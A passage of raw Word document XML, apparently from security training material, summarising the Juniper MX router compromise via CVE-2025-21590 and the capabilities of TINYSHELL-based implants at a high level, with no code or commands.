          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers exploited CVE-2025-21590 to bypass Junos OS security protections and inject malicious code into memory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE47D31" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TINYSHELL-based Malware Variants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3B0F8" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Several malware variants masqueraded as legitimate binaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8F0C8" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">appid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA2EED" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">irad </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77271F" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lmpad </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68248EC0" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jdosd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D854852" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oemd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D345332" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>These implants supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B688419" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote shell access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A0923E" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217223A" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxying </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C88CC69" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic signaling </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67169A9B" w14:textId="1C701B5D" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D704E77" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9D6ED" w14:textId="25B7624E" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07430B74" wp14:editId="2977F865">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1828800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-48260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1392628662" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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7333099" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:2in;margin-top:-3.8pt;width:240pt;height:33.75pt;z-index:2516787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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Real World Incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D0121" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F34C0C" w14:textId="1BE45EFE" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The compromise of Juniper Networks MX routers was a major infrastructure-focused cyberattack targeting devices running Junos OS. Attackers exploited CVE-2025-21590 to bypass security protections, gain root access, and inject malicious code into router memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B948CA" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Features of the Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A64D1" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom backdoors embedded inside legitimate Junos processes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A944C" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Covert packet-capture capabilities for monitoring network traffic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7F070" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware designed to survive and evade detection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FE7CF" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In-memory code injection to reduce forensic evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CB1FC" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TINYSHELL-Based Malware Variants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354FCD2" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attackers deployed lightweight implants disguised as normal system binaries, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73C9D2" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">appid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B126CB6" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">irad </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE1396A" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">lmpad </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764734B" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">jdosd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A7F1A4" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">oemd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE01EA" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These variants were based on TINYSHELL and supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC1F9C" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote shell access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE586F4" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File upload/download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06770C0C" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxying and tunneling </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015CDD3" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Covert traffic signaling </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F85EA98" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why It Was Significant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85CC58" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
